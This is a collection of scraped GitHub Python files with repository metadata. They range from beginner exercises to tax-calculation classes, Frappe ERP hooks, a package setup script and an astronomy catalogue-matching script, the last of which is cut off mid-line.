+{"seq_id":"1090062787","text":"# create a calculater that determines the number of times the letters \n# t, r, u, e, l, o, v, e occur in 2 names\n\n# print() greeting\n\nprint(\"Welcome to Love Calculator!\")\n\n# Ask user for both names\n\nname1 = input(\"What is your name? \\n\") \nname2 = input(\"What is thier name? \\n\")\n\n# Use lower() to make all letters lower case and easier to count\n\nname1 = name1.lower()\nname2 = name2.lower()\n\n# Create variables to store scores\n\ntotal1 = 0\ntotal2 = 0\n\n# Add together the scores\n\ntotal1 += (name1 + name2).count(\"t\")\ntotal1 += (name1 + name2).count(\"r\")\ntotal1 += (name1 + name2).count(\"u\")\ntotal1 += (name1 + name2).count(\"e\")\ntotal2 += (name1 + name2).count(\"l\")\ntotal2 += (name1 + name2).count(\"o\")\ntotal2 += (name1 + name2).count(\"v\")\ntotal2 += (name1 + name2).count(\"e\")\n\n# Concatenate the 2 int for your final score\n\ntotal = int(str(total1) + str(total2))\n\n# print() scores along with message for user\nif total < 10 or total > 90:\n print(f\"Your score is {total}, you go together like coke and mentos.\")\nelif total > 40 and total < 50:\n print(f\"Your score is {total}, you are alright together.\")\nelse:\n print(f\"Your score is {total}.\")\n ","repo_name":"JHSpaz988/-100daysofcodingpythonchallenge","sub_path":"day3/projects/love_calculator.py","file_name":"love_calculator.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30791049574","text":"\"\"\"\n(c) 2022 Shoshi (Sharon) Cooper. No duplication is permitted for commercial use. Any significant changes made must be\nstated explicitly and the original source code, if used, must be available and credited to Shoshi (Sharon) Cooper.\n\nFor stock-related classes\n\"\"\"\nfrom TaxAlgorithms.dependencies_for_programs.aggregated_list_class import Aggregated\n\n\nclass CorporateItems(object):\n def __init__(self, fmv, ab=None, **kwargs):\n super().__init__(**kwargs)\n self.fmv = fmv\n # Adjusted basis will be calculated once it's given to the shareholder\n self.ab = ab\n\n\nclass Stock(CorporateItems):\n def __init__(self, fmv, shares, ab=None, shareholder=None, par=None, corp=None, **kwargs):\n super().__init__(fmv=fmv, ab=ab, **kwargs)\n self.shareholder = shareholder\n self.par = par\n self.shares = shares\n self.corp = corp\n\n def sell(self, shareholder, num_shares, amount):\n shareholder.shares = type(self)(amount, num_shares)\n shareholder.shares.ab = amount\n proportion = num_shares / self.shares\n gain = amount - proportion * self.ab\n self.shares -= num_shares\n self.fmv = (amount / num_shares) * self.shares\n self.ab -= proportion * self.ab\n\n self.gain_on_sale = gain\n\n # Must update amount if I have it.\n if hasattr(self, '_amount'):\n self._amount = self.ab\n\n @property\n def amount(self):\n try:\n return self._amount\n except AttributeError:\n return self.ab\n\n @amount.setter\n def amount(self, value):\n self._amount = value\n\n\n def set_holding_period(self, properties_contributed):\n \"\"\"\n We're looking at the holding period in terms of the % of a single share. If you only sold 1 share of stock\n and you had a 40% to 60% breakdown, you'd still treat 40% as short term and 60% as long term.\n \"\"\"\n self.long_term_percent = 0\n self.short_term_percent = 0\n\n if all([prop.does_holding_period_tack for prop in properties_contributed]):\n # Then set holding period to \"long term\" or longer than 1 year\n self.long_term_percent = 1\n elif all([not prop.does_holding_period_tack for prop in properties_contributed]):\n self.short_term_percent = 1\n else:\n # When you have a mixed bag of holding periods like this, we must allocate based per share based on FMV\n agg_fmv = sum([prop.fmv for prop in properties_contributed])\n for prop in properties_contributed:\n # (property fmv / aggregate fmv)\n if prop.does_holding_period_tack:\n self.long_term_percent += (prop.fmv / agg_fmv)\n else:\n self.short_term_percent += (prop.fmv / agg_fmv)\n\n def __str__(self):\n return f\"<{self.shares} in {self.corp}>\"\n\n def __repr__(self):\n return str(self)\n\n\nclass Boot(CorporateItems):\n def __init__(self, fmv):\n super().__init__(fmv)\n # The adjusted basis of boot received by the shareholder is the FMV on date of transfer\n self.ab = self.fmv\n # holding period of boot received is always a fresh start, so starts at 0\n self.holding_period = 0\n\n\nclass Bonds(Boot):\n \"\"\"Bonds and corporate debt do not count as stock for section 351\"\"\"\n pass\n\n\n\nclass VotingStock(Stock):\n pass\n\nclass NonVotingStock(Stock):\n pass\n\n\n# Partial shares\n\nclass PartialShares(object):\n\n def __init__(self, stock_object, proportion):\n self.stock_object = stock_object\n self.proportion = proportion\n\n def __getattr__(self, item):\n if item == 'stock_object' or item == 'proportion':\n return super().__getattribute__(item)\n attribute = getattr(self.stock_object, item)\n if isinstance(attribute, (int, float)):\n return attribute * self.proportion\n 
return attribute\n\n\n\nclass MultiplePurchases(Aggregated):\n \"\"\"Multiple Purchases of the same stock\"\"\"\n def __init__(self, iterable=(), corp_name=None):\n super().__init__(iterable)\n self.corp = corp_name\n\n\n\n\nclass CommonStock(VotingStock):\n\n def stock_dividend(self, other_stock_object):\n # Adding stock in a stock dividend or a stock split\n if not isinstance(other_stock_object, type(self)):\n # if it's a different class of stock (So preferred or class B common or something)\n total_fmv = self.fmv + other_stock_object.fmv\n basis_of_self = (self.fmv / total_fmv) * self.ab\n basis_of_other = (other_stock_object.fmv / total_fmv) * self.ab\n self.ab = basis_of_self\n other_stock_object.ab = basis_of_other\n return self, other_stock_object\n # if it's the same class of stock, then the number of shares changes so the basis per share changes, but AB\n # does not change\n self.shares += other_stock_object.shares\n return self\n\n\nclass StockRights(object):\n def __init__(self, class_of_stock, price_guaranteed, num_rights, mv_rights_pr, curr_stock):\n \"\"\"\n Class of stock -- which class of stock it is. Should be an actual Python class (in this document or otherwise)\n Price guaranteed -- guaranteed purchase price\n Num_rights -- the number of rights you received\n mv_rights_pr -- market value of rights per right\n curr_stock -- if you already own this class of stock, this is where you pass that info in.\n \"\"\"\n self.class_of_stock = class_of_stock\n self.price_guaranteed = price_guaranteed\n self.num_rights = num_rights\n self.curr_stock = curr_stock\n\n self._mv_stock_ps = self.curr_stock.fmv / self.curr_stock.shares\n self._mv_rights_pr = mv_rights_pr\n\n self.ab = 0\n\n value_of_rights = self.num_rights * self.market_value_rights_per_right\n # Must allocate from original stock if value of rights >= .15 * value of stock\n if value_of_rights >= .15 * self.curr_stock.fmv:\n self.allocate()\n\n\n def allocate(self):\n stock_value = self.market_value_stock_per_share * self.curr_stock.shares\n rights_value = self.market_value_rights_per_right * self.num_rights\n cost_of_stock = self.curr_stock.ab\n self.curr_stock.ab = round((stock_value / (stock_value + rights_value)) * cost_of_stock, 2)\n self.ab = round((rights_value / (stock_value + rights_value)) * cost_of_stock, 2)\n\n @property\n def market_value_stock_per_share(self):\n return self._mv_stock_ps\n\n @property\n def market_value_rights_per_right(self):\n return self._mv_rights_pr\n\n def exercise(self, num_rights):\n # FMV is set to None because it does not matter and is not relevant at the moment\n new_shares = self.class_of_stock(fmv=None, shares=num_rights,\n ab=(self.ab * num_rights / self.num_rights) +\n num_rights * self.price_guaranteed)\n self.ab = self.ab * (self.num_rights - num_rights) / self.num_rights\n self.num_rights -= num_rights\n return new_shares\n\n def sell(self, num_rights, price_per_right):\n capital_gain = num_rights * price_per_right - self.ab\n self.num_rights -= num_rights\n return capital_gain\n\n\ndef is_stock_nonqualified_preferred(does_holder_have_right_to_require_issuer_to_redeem_or_buy_stock: bool,\n is_issuer_required_to_redeem_buy_stock: bool, does_issuer_have_right_to_redeem_buy_stock: bool,\n likelihood_of_exercising_that_right_on_issue_date: float,\n does_dividend_rate_on_stock_vary_with_reference_to_interest_rates_commodities_etc):\n if does_holder_have_right_to_require_issuer_to_redeem_or_buy_stock:\n return True\n if is_issuer_required_to_redeem_buy_stock:\n return True\n if 
does_issuer_have_right_to_redeem_buy_stock:\n if likelihood_of_exercising_that_right_on_issue_date > .5:\n return True\n if does_dividend_rate_on_stock_vary_with_reference_to_interest_rates_commodities_etc:\n return True\n return False\n\n\n\n\nclass PrefStock(NonVotingStock):\n\n def __init__(self, fmv, shares, corp=None, ab=None, par=None, **kwargs):\n super().__init__(fmv=fmv, shares=shares, corp=corp, ab=ab, par=par, **kwargs)\n self._info = kwargs\n\n\nclass PreferredStock(object):\n def __new__(cls, fmv, shares, ab=None, corp=None, par=None, flat_dividend=0, dividend_rate=0,\n dividend_rate_reference_index=None, redeemable_for=(), manditorily_redeemable=False,\n holder_has_right_to_require_redemption=False, right_of_issuer_to_redeem_stock=None,\n requirement_of_issuer_to_redeem_stock=False,\n **kwargs):\n information = {'flat_dividend': flat_dividend,\n 'dividend_rate':dividend_rate,\n 'dividend_rate_reference_index': dividend_rate_reference_index,\n 'redeemable_for': redeemable_for,\n 'manditorily_redeemable': manditorily_redeemable,\n 'right_of_issuer_to_redeem_stock': right_of_issuer_to_redeem_stock,\n 'requirement_of_issuer_to_redeem_stock': requirement_of_issuer_to_redeem_stock,\n 'holder_has_right_to_require_redemption': holder_has_right_to_require_redemption\n }\n information.update(kwargs)\n\n type_of_stock = QualifiedPreferredStock\n # Check if it's nonqualified preferred stock based on the criteria below:\n counts_as_nonqualified_preferred = [\n dividend_rate_reference_index is not None,\n len(redeemable_for) > 0 or manditorily_redeemable,\n requirement_of_issuer_to_redeem_stock or holder_has_right_to_require_redemption,\n right_of_issuer_to_redeem_stock is not None\n ]\n for is_nonqualified in counts_as_nonqualified_preferred:\n if is_nonqualified:\n type_of_stock = NonQualifiedPreferredStock\n break\n\n return type_of_stock(fmv=fmv, shares=shares, ab=ab, corp=corp, par=par, **information)\n\n\n\nclass QualifiedPreferredStock(PrefStock):\n pass\n\nclass NonQualifiedPreferredStock(PrefStock, Boot):\n pass\n\n\n\n\nclass ClassesStock(object):\n \"\"\"A corporation's collection of stock classes\"\"\"\n\n class DefStck(object):\n def __init__(self, stnding):\n self.issued = stnding\n self.outstanding = stnding\n self.treasury = []\n self.par = None\n self.value = 0\n self.apic = 0\n self.shares_issued = Aggregated()\n\n def __init__(self, classes_stock_to_outstanding_shares:dict = None):\n self._information = {}\n\n if classes_stock_to_outstanding_shares is not None:\n for stck_class, outstanding in classes_stock_to_outstanding_shares.items():\n self.add_stock_class(stck_class, outstanding)\n\n def add_stock_class(self, stock_class, outstanding_shares, issued=None, treasury=0, par=None):\n \"\"\"Adds a class of stock\"\"\"\n self._information[stock_class] = self.DefStck(outstanding_shares)\n issued = issued if issued is not None else outstanding_shares\n for attr_name, attr_val in [('issued', issued), ('treasury', treasury), ('par', par)]:\n self._information[stock_class][attr_name] = attr_val\n\n def issue(self, stock_class, shares_issued, issue_price, issue_costs):\n \"\"\"Issues new stock\"\"\"\n stock_info = self[stock_class]\n if stock_info.par is None:\n stock_info['value'] += issue_price - issue_costs\n else:\n stock_info['value'] += shares_issued * stock_info.par\n stock_info['apic'] += (issue_price - (shares_issued * stock_info.par)) - issue_costs\n\n for attr_name in ['issued', 'outstanding']:\n stock_info[attr_name] += shares_issued\n\n shares = 
stock_class(fmv=issue_price, shares=shares_issued)\n stock_info['shares_issued'].append(shares)\n return shares\n\n def treasury_resale(self, stock_class, num_shares, total_sold_for, costs):\n \"\"\"Resells treasury stock\"\"\"\n # TODO: Do this\n raise NotImplementedError(\"Didn't do this one yet\")\n\n def buy_back(self, shares):\n \"\"\"Buys back shares as treasury stock\"\"\"\n info = self[type(shares)]\n if info.par is None:\n info.value -= shares.fmv\n else:\n info.value -= shares.shares * info.par\n info.apic -= shares.fmv - shares.shares * info.par\n\n info.outstanding -= shares.shares\n info.treasury.append(shares)\n\n\n def __getitem__(self, stock_class):\n return self._information[stock_class]\n\n\n def _add_attr(self, attr_name, start=0):\n \"\"\"Compiles an attribute across all stock classes\"\"\"\n total = start\n for stck_class, information in self._information.items():\n total += information[attr_name]\n return total\n\n @property\n def outstanding(self):\n return self._add_attr('outstanding')\n\n @property\n def fmv(self):\n return self._add_attr('value') + self._add_attr('apic')\n\n @property\n def ab(self):\n shrs = Aggregated(self._add_attr('shares_issued', []))\n return shrs.ab\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shoshicooper/TaxAlgorithms","sub_path":"TaxAlgorithms/dependencies_for_programs/classes_stock.py","file_name":"classes_stock.py","file_ext":"py","file_size_in_byte":13419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
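# A usage sketch for the record above (values are illustrative assumptions):
# a same-class stock dividend adds shares without changing total basis, so the
# per-share basis falls while the aggregate adjusted basis (ab) stays fixed.
old = CommonStock(fmv=1000.0, shares=100, ab=500.0)
old = old.stock_dividend(CommonStock(fmv=0.0, shares=10))
assert old.shares == 110 and old.ab == 500.0  # basis/share: 5.00 -> ~4.55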
+{"seq_id":"5907244760","text":"from tkinter import *\n\nclass Application(Frame):\n \n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n self.createWidgets()\n \n def createWidgets(self):\n top_frame = Frame(self)\n self.entry1 = Entry(top_frame)\n self.entry1.pack(side=LEFT)\n self.entry2 = Entry(top_frame)\n self.entry2.pack(side=LEFT)\n top_frame.pack()\n bottom_frame = Frame()\n self.resultlabel = Label(bottom_frame,text='Product:')\n self.resultlabel.pack()\n self.button = Button(bottom_frame,text='Multiply',command=self.handle)\n self.button.pack()\n bottom_frame.pack()\n \n def handle(self):\n entry1 = self.entry1.get()\n entry2 = self.entry2.get()\n try:\n entry1 = float(entry1)\n except ValueError:\n entry1 = False\n try:\n entry2 = float(entry2)\n except ValueError:\n entry2 = False\n if entry1 and entry2:\n product = entry1 * entry2\n else:\n product = '***ERROR***'\n self.resultlabel.config(text='Product:{0}'.format(product))\n \nroot = Tk()\napp = Application(master=root)\napp.mainloop()\n","repo_name":"aborgo/Certification_Work","sub_path":"tkinter_multiplier.py","file_name":"tkinter_multiplier.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28608224787","text":"'''Hacer un programa que llene obligatoriamente un arreglo de numeros \r\nde 5 posiciones validados , al final debe mostrar cuantos pares e impares se encuentran en el arreglo '''\r\n\r\ndef validarNumero(n):\r\n if n.isdigit():\r\n return int(n)\r\n else:\r\n print('No es un numero')\r\n return 0\r\n\r\na = [0,0,0,0,0]\r\ncp = 0\r\nci = 0\r\nfor i in range (0,5):\r\n b = validarNumero(input ('Escribe un valor\\n'))\r\n if not b == 0:\r\n a[i] = b\r\n \r\nfor i in a:\r\n if i % 2 == 0:\r\n cp += 1\r\n else:\r\n ci += 1\r\nfor i in a:\r\n print(i)\r\n\r\nprint('Total de pares ', cp, ' y de impares' ,ci )","repo_name":"jis0017/Parcial_1_python_jesus","sub_path":"PRACTIA11.py","file_name":"PRACTIA11.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2215098874","text":"import math\nimport numpy as np\nimport scipy as sp\n\n\n\nclass vector_td(np.matrix):\n\n def __new__(cls, input_array):\n obj = np.matrix(input_array, float).view(cls)\n \n # transposes to the matrix arithmetic order of 1 column 3 rows \n return obj.T\n\n def __str__(self):\n return 'vector_td containing elements: '+str(self)\n\n\n\nclass transformation_matrix(np.matrix):\n\n def __new__(cls, rotang=None, rotax=None, travec=None):\n obj = np.matrix(np.diagflat(np.ones(4)), float).view(cls) \n \n if travec != None or rotang or rotax != None:\n\n if travec != None:\n obj[:3,3:4] = travec\n \n if rotang or rotax != None: \n\n if rotang:\n obj.rotang = rotang\n\n if rotax != None:\n obj.rotax = rotax\n\n else:\n obj.rotax = vector_td([0,0,0])\n\n obj.matrix_rotate()\n \n else:\n print('neigther vectortd nor angle given')\n \n return obj\n\n\n def __array_finalize__(self, obj):\n self.rotang = getattr(obj, 'rotang', None)\n self.rotax = getattr(obj, 'rotax' , None)\n self.travec = getattr(obj, 'travec', None)\n\n\n def matrix_rotate(self):\n c = math.cos(math.pi/180*self.rotang)\n s = math.sin(math.pi/180*self.rotang)\n\n x = self.rotax[0]\n y = self.rotax[1]\n z = self.rotax[2]\n\n self[0,0] = c+(1-c)*(x)**2\n self[0,1] = (1-c)*x*y-s*z\n self[0,2] = (1-c)*x*z+s*y\n\n self[1,0] = (1-c)*x*y+s*z\n self[1,1] = c+(1-c)*y**2\n self[1,2] = (1-c)*y*z-s*x\n\n self[2,0] = (1-c)*x*z-s*y\n self[2,1] = (1-c)*y*z+s*x\n self[2,2] = c+(1-c)*z**2\n\n return self\n\n def __str__(self):\n return 'Transformation Matrix mit der Matrix: '+self.name+'und vom typ type(self) '\n\n\n\nclass vector_td_position(vector_td):\n\n def __new__(cls, coordinates):\n obj = vector_td(coordinates).view(cls)\n obj.matrix = transformation_matrix()\n\n return obj\n\n\n def __array_finalize__(self, obj):\n self.matrix = getattr(obj, 'matrix', None)\n\n\n def rotate(self, rotang, rotax):\n self.matrix = transformation_matrix(rotang=rotang, rotax=vector_td(rotax))[:3,:3]\n result = self.matrix * self\n\n for i in range(len(result)):\n self[i] = result[i]\n\n return self \n\n\n def transit(self, travec):\n self.matrix = transformation_matrix(travec=vector_td(travec))[:3,3:4]\n result = self.matrix + np.asmatrix(self)\n\n for i in range(len(result)):\n self[i] = result[i]\n\n return self\n \n\n def translocate(self, rotax, rotang=0, travec=np.zeros(3)):\n self.matrix = transformation_matrix(rotang=0, rotax=vector_td(0,0,0), travec=vector_td(0,0,0))\n vector = np.resize(self, (4,1))\n vector[3] = 1\n result = self.matrix * vector\n\n for i in range(3):\n self[i] = result[i]\n\n return self\n\n\n def __str__(self):\n return 'vector_td_position: '+type(self)\n\n\n\nclass td_object(list):\n\n def __new__(cls, vertex_list):\n print ('cls')\n obj = vertex_list\n obj.orient = transformation_matrix()[:3,:3]\n obj.position = vector_td_position([0,0,0])\n \n def __array_finalize__(obj, self):\n self.orient = getattr(obj, 'orient', None)\n self.position = getattr(obj, 'position', None)\n","repo_name":"JoergReinhardt/python_kinematic","sub_path":"kinematic.py","file_name":"kinematic.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11152521582","text":"import frappe, json\n\n@frappe.whitelist()\ndef check_order_tracking(name):\n order_tracking = frappe.db.sql(\"\"\" SELECT COUNT(*) as count FROM `tabOrder Tracking` WHERE purchase_order_ref=%s \"\"\",name, as_dict=1 )\n\n return order_tracking[0].count > 0\n\ndef validate_po(doc, method):\n if len(doc.orders) > 0:\n for i in doc.items:\n if i.qty != i.final_moq:\n frappe.throw(\"Final MOQ (\" + str(i.final_moq) + \") for item \" + i.item_name + \" is not equal to Order Qty (\" + str(i.qty) + \")\")\n\n@frappe.whitelist()\ndef create_order_tracking(doc):\n data = json.loads(doc)\n print(data['orders'])\n\n obj = {\n \"doctype\": \"Order Tracking\",\n \"supplier\": data['supplier'],\n \"purchase_order_ref\": data['name'],\n \"order_tracking_items\": get_order_tracking_items(data),\n \"purchase_order_date\": data['transaction_date'],\n }\n ot = frappe.get_doc(obj).insert()\n return ot.name\n\ndef get_order_tracking_items(doc):\n items = []\n for i in doc['orders']:\n items.append({\n \"order\": i['order'],\n })\n return items\ndef get_order_tracking_location():\n status = [{\n \"status\": \"Waiting\",\n }]\n return status\n\n\ndef on_trash_po(doc, method):\n for i in doc.orders:\n frappe.db.sql(\"\"\" UPDATE `tabOrder` SET purchase_order='' WHERE name=%s \"\"\", (i.order))\n frappe.db.commit()","repo_name":"exvas/grand","sub_path":"grand/doc_events/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38614674994","text":"\"\"\"\nQuestion: Anagrams\n\nGiven two strings s and t , write a function to determine if t is an anagram of s.\n\nSample Input 1\ns = \"anagram\", t = \"nagaram\"\nSample Output 1\nTrue\n\nSample Input 2\ns = \"rat\", t = \"car\"\nSample Output 2\nFalse\n\"\"\"\n\n# Time Complexity --> nlogn + mlogm\ndef check_anagram(sentence_1,sentence_2):\n #write your code here\n sentence_1 = (sentence_1.lower()).replace(\" \", \"\")\n sentence_2 = (sentence_2.lower()).replace(\" \", \"\")\n\n if sorted(sentence_1) == sorted(sentence_2):\n return True\n else:\n return False\n \nif __name__ == \"__main__\":\n sentence_1 = \"aabc\"\n sentence_2 = \"abcd\"\n print(check_anagram(sentence_1,sentence_2))\n","repo_name":"Mananjot/100-Day-of-Code","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"3598966684","text":"from sorter_inceptionV3 import Sorter\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"train_dir\")\n parser.add_argument(\"validation_dir\")\n parser.add_argument(\"save_weights_path\")\n parser.add_argument(\"--finetuning\", type=str, default=\"\")\n parser.add_argument(\"--gpus\", type=int, default=1)\n args = parser.parse_args()\n classes = [\"hyper\", \"non-hyper\"]\n train_dir = args.train_dir\n validation_dir = args.validation_dir\n\n sorter = Sorter(\n classes=classes,\n train_dir=train_dir,\n validation_dir=validation_dir,\n save_weights_path=args.save_weights_path,\n finetuning_weights_path=args.finetuning,\n img_size=(300, 300),\n n_gpus=args.gpus,\n color_randomize_options={\n 'h': 0.05,\n 's': 0.1,\n 'v': 20,\n },\n ealry_stopping_options={\n 'patience': 10,\n }\n )\n\n # train\n sorter.train()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"niigata-bioinfo/hypermutation-ai-code","sub_path":"detect_hypermutation/train_hyper.py","file_name":"train_hyper.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11627163921","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"neo4j_for_django\",\n version=\"0.0.2\",\n author=\"Lila Rest\",\n author_email=\"mail@lila.rest\",\n description=\"This Python 3.X package provides Neo4j support for the Django framework.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/LilaRest/neo4j_for_django\",\n packages=setuptools.find_packages(),\n install_requires=['neo4j'],\n extras_require={\"bcrypt\": [\"bcrypt\"], },\n classifiers=[\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n \"Programming Language :: Python :: 3\",\n 'Programming Language :: Python :: 3 :: Only',\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n \"Framework :: Django\",\n \"Framework :: Django :: 2.2\",\n \"Natural Language :: English\",\n \"Topic :: Database\",\n ],\n)","repo_name":"LilaRest/neo4j_for_django","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71577357374","text":"#!/usr/bin/env python\n\n\"\"\"compare two tractor catalogues that should have same objects\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport matplotlib\nmatplotlib.use('Agg') #display backend\nimport os\nimport sys\nimport logging\nimport argparse\nimport numpy as np\nfrom scipy import stats as sp_stats\n#import seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nfrom astropy.io import fits\nfrom astropy.table import vstack, Table\nfrom astrometry.libkd.spherematch import match_radec\n\n#import thesis_code.targets as targets\nfrom legacyanalysis import targets \nfrom legacyanalysis.pathnames import get_outdir\n\n\nclass Matched_Cats():\n def __init__(self):\n self.data={}\n def initialize(self,data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos):\n self.d12= d12 #deg separations between matches objects\n self.deg2_decam= deg2_decam \n self.deg2_bokmos= deg2_bokmos \n self.data['m_decam']= targets.data_extract(data_1,m1) \n self.data['m_bokmos']= targets.data_extract(data_2,m2)\n self.data['u_decam']= targets.data_extract(data_1,m1_unm)\n self.data['u_bokmos']= targets.data_extract(data_2,m2_unm)\n def add_d12(self,d12):\n '''concatenate new d12 with existing matched deg separation array'''\n self.d12= np.concatenate([self.d12, d12])\n def add_dict(self,match_type,new_data):\n '''match_type -- m_decam,m_bokmos,u_decam, etc\n new data -- data returend from read_from..() to be concatenated with existing m_decam, etc'''\n for key in self.data[match_type].keys(): \n self.data[match_type][key]= np.concatenate([self.data[match_type][key],new_data[key]])\n\ndef deg2_lower_limit(data):\n '''deg2 spanned by objects in each data set, lower limit'''\n ra= data['ra'].max()-data['ra'].min()\n assert(ra > 0.)\n dec= abs(data['dec'].max()-data['dec'].min())\n return ra*dec\n\ndef match_it(cat1,cat2):\n '''cat1,2 are tractor catalogue to match objects between'''\n #match cats\n data_1= targets.read_from_tractor_cat(cat1)\n data_2= targets.read_from_tractor_cat(cat2)\n #deg2 spanned by objects in each data set\n deg2_decam= deg2_lower_limit(data_1)\n deg2_bokmos= deg2_lower_limit(data_2)\n #all the 'all1' objects that have match in 'all2' \n m1, m2, d12 = match_radec(data_1['ra'],data_1['dec'],data_2['ra'],data_2['dec'],\\\n 1.0/3600.0,nearest=True)\n m1_unm = np.delete(np.arange(len(data_1['ra'])),m1,axis=0)\n m2_unm = np.delete(np.arange(len(data_2['ra'])),m2,axis=0)\n return data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos\n\ndef read_lines(fn):\n fin=open(fn,'r')\n lines=fin.readlines()\n fin.close()\n return list(np.char.strip(lines))\n\n#plotting vars\nlaba=dict(fontweight='bold',fontsize='medium')\nkwargs_axtext=dict(fontweight='bold',fontsize='large',va='top',ha='left')\nleg_args=dict(frameon=True,fontsize='x-small')\n\ndef plot_nobs(b):\n '''make histograms of nobs so can compare depths of g,r,z between the two catalogues''' \n hi=0 \n for cam in ['m_decam','m_bokmos']:\n for band in 'grz':\n hi= np.max((hi, b[cam].data[band+'_nobs'].max()))\n bins= hi\n for cam in ['m_decam','m_bokmos']:\n for band in 'grz':\n junk=plt.hist(b[cam].data[band+'_nobs'],bins=bins,normed=True,cumulative=True,align='mid')\n xlab=plt.xlabel('nobs %s' % band, **laba)\n ylab=plt.ylabel('CDF', **laba)\n plt.savefig(os.path.join(get_outdir('bmd'),'hist_nobs_%s_%s.png' % (band,cam[2:])), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n#def plot_nobs_2(b):\n# '''improved version of plot_nobs'''\n# for cam in 
['m_decam','m_bokmos']:\n# for band in 'grz':\n# junk=plt.hist(b[cam].data[band+'_nobs'],bins=10,normed=True,cumulative=True,align='mid')\n# xlab=plt.xlabel('nobs %s' % band, **laba)\n# ylab=plt.xlabel('CDF', **laba)\n# plt.savefig(os.path.join(get_outdir('bmd'),'hist_nobs_%s_%s.png' % (band,cam[2:])), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n# plt.close()\n#\n#\n# c1= 'b' \n# c2= 'r'\n# ###\n# decam_max= [b['m_decam'].data[b+'_nobs'].max() for b in 'grz']\n# bokmos_max= [b['m_bokmos'].data[b+'_nobs'].max() for b in 'grz']\n# types= np.arange(1, np.max((decam_max,bokmos_max)) +1)\n# ind = types.copy() # the x locations for the groups\n# width = 1 # the width of the bars\n# ###\n# ht_decam, ht_bokmos= np.zeros(5,dtype=int),np.zeros(5,dtype=int)\n# for cnt,typ in enumerate(types):\n# ht_decam[cnt]= np.where(obj[m_types[0]].data['type'] == typ)[0].shape[0] / float(obj['deg2_decam'])\n# ht_bokmos[cnt]= np.where(obj[m_types[1]].data['type'] == typ)[0].shape[0] / float(obj['deg2_bokmos'])\n# ###\n# fig, ax = plt.subplots()\n# rects1 = ax.bar(ind, ht_decam, width, color=c1)\n# rects2 = ax.bar(ind + width, ht_bokmos, width, color=c2)\n# ylab= ax.set_ylabel(\"counts/deg2\")\n# if matched: ti= ax.set_title('Matched')\n# else: ti= ax.set_title('Unmatched')\n# ax.set_xticks(ind + width)\n# ax.set_xticklabels(types)\n# ax.legend((rects1[0], rects2[0]), ('decam', 'bokmos'),**leg_args)\n# #save\n# if matched: name='hist_types_Matched.png'\n# else: name='hist_types_Unmatched.png'\n# plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[ylab,ti], bbox_inches='tight',dpi=150)\n# plt.close()\n#\n\ndef plot_radec(obj, addname=''): \n '''obj[m_types] -- DECaLS() objects with matched OR unmatched indices'''\n #set seaborn panel styles\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots(1,2,figsize=(9,6),sharey=True,sharex=True)\n plt.subplots_adjust(wspace=0.25)\n #plt.subplots_adjust(wspace=0.5)\n #plot\n ax[0].scatter(obj['m_decam'].data['ra'], obj['m_decam'].data['dec'], \\\n edgecolor='b',c='none',lw=1.)\n ax[1].scatter(obj['u_decam'].data['ra'], obj['u_decam'].data['dec'], \\\n edgecolor='b',c='none',lw=1.,label='DECaLS')\n ax[1].scatter(obj['u_bokmos'].data['ra'], obj['u_bokmos'].data['dec'], \\\n edgecolor='g',c='none',lw=1.,label='BASS/MzLS')\n for cnt,ti in zip(range(2),['Matched','Unmatched']):\n ti=ax[cnt].set_title(ti,**laba)\n xlab=ax[cnt].set_xlabel('RA', **laba)\n ylab=ax[0].set_ylabel('DEC', **laba)\n ax[0].legend(loc='upper left',**leg_args)\n #save\n #sns.despine()\n plt.savefig(os.path.join(get_outdir('bmd'),'radec%s.png' % addname), bbox_extra_artists=[xlab,ylab,ti], bbox_inches='tight',dpi=150)\n plt.close()\n\n\ndef plot_HistTypes(obj,m_types=['m_decam','m_bokmos'], addname=''):\n '''decam,bokmos -- DECaLS() objects with matched OR unmatched indices'''\n #matched or unmatched objects\n if m_types[0].startswith('m_') and m_types[1].startswith('m_'): matched=True\n elif m_types[0].startswith('u_') and m_types[1].startswith('u_'): matched=False \n else: raise 